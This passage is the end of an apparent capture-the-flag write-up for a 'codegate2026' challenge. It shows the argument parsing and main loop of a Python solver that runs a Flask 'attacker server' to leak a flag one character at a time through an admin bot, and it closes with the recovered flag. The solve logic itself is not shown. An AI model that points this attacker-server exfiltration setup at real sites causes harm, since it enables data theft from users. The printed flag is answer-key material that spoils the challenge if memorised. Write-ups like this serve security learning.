ap.add_argument("--bot", default="http://localhost:5001",
help="Admin bot URL")
ap.add_argument("--prefix", default="codegate2026{",
help="Known flag prefix")
ap.add_argument("--alphabet",
default="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_}",
help="Candidate characters")
ap.add_argument("--port", type=int, default=8000,
help="Attacker server listen port")
ap.add_argument("--team-id", default="solver",
help="Team ID header for bot rate limiting")
ap.add_argument("--step-delay", type=float, default=1.0,
help="Delay between successful steps (seconds)")
ap.add_argument("--retry-delay", type=float, default=3.0,
help="Delay before retrying a failed step (seconds)")
args = ap.parse_args()
# Start Flask server in background thread
server = threading.Thread(
target=lambda: app.run(host="0.0.0.0", port=args.port, threaded=True),
daemon=True,
)
server.start()
print(f"[*] Attacker server listening on 0.0.0.0:{args.port}")
time.sleep(0.5)
try:
solve(args)
except KeyboardInterrupt:
print("\n[*] Interrupted")
if __name__ == "__main__":
main()
7. Flag
codegate2026{bfb4UsBy7OajV4p55QFOjDEEbZaaK1zI}